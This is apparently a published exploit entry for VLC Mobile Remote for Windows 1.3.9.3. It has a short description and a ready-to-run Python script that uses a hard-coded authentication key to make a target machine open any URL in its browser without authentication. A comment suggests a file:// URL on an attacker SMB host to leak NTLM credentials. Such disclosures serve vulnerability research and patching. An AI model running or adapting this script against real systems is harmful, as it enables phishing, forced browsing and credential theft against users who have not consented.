# Exploit Title: VLC Mobile Remote (VMR) for Windows v1.3.9.3  Remote
Arbitrary URL Launch
# Date: 06/24/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://vlcmobileremote.com
# Software Link: https://vlcmobileremote.com/Releases/Setup.exe
# Version: 1.3.9.3
# Tested on: Windows 10 (Build 19044)

'''
Description:

VLC Mobile Remote for Windows 1.3.9.3 allows an unauthenticated attacker to
remotely cause the target system to open any URL in the victim’s default
web browser by sending a specially crafted request. This can lead to forced
browsing to malicious sites, phishing attacks, or NTLM credential exposure
via SMB or file URLs.

'''

import socket, time, json

HOST = "192.168.8.105"
PORT = 5916
AUTH_KEY = "I2t3H*9s65J7F!E03K9M"
URL = "https://google.com" # NTLM  credential leakage with  file://///
192.168.8.100/any

pkt = {
    "appAuthenticationKey": AUTH_KEY,
    "password": "",
    "sentTime": str(int(time.time() * 1000)),
    "request": f"/requests/system/command?key=launch_url&value={URL}"
}

with socket.socket() as s:
    s.connect((HOST, PORT))
    s.sendall((json.dumps(pkt) + "\x0a").encode())
    print(f"[>] Launching URL: {URL}")

print("[✓] Done.")